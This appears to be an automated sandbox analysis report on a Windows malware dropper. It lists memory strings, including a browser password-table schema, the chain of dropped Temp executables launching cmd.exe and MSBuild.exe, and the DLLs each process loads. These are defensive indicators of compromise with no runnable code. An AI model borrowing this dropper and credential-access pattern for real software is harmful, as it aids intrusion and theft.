                                Source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: u42w.0.exe, u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                                Source: u42w.0.exe, 00000001.00000003.1771521673.00000000231B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                                Source: g77dRQ1Csm.exeVirustotal: Detection: 40%
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile read: C:\Users\user\Desktop\g77dRQ1Csm.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\g77dRQ1Csm.exe "C:\Users\user\Desktop\g77dRQ1Csm.exe"
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess created: C:\Users\user\AppData\Local\Temp\u42w.0.exe "C:\Users\user\AppData\Local\Temp\u42w.0.exe"
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess created: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe"
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess created: C:\Users\user\AppData\Local\Temp\u42w.3.exe "C:\Users\user\AppData\Local\Temp\u42w.3.exe"
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1180
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 2332
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess created: C:\Users\user\AppData\Local\Temp\u42w.0.exe "C:\Users\user\AppData\Local\Temp\u42w.0.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess created: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess created: C:\Users\user\AppData\Local\Temp\u42w.3.exe "C:\Users\user\AppData\Local\Temp\u42w.3.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: msimg32.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: zipfldr.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: shdocvw.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: winshfhc.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: winshfhc.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: msimg32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: mozglue.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: msvcp140.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: msimg32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: oledlg.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: pla.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: pdh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: tdh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: wevtapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: shdocvw.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: security.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: olepro32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: schedcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: logoncli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: msxml6.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: rasadhlp.dllJump to behavior
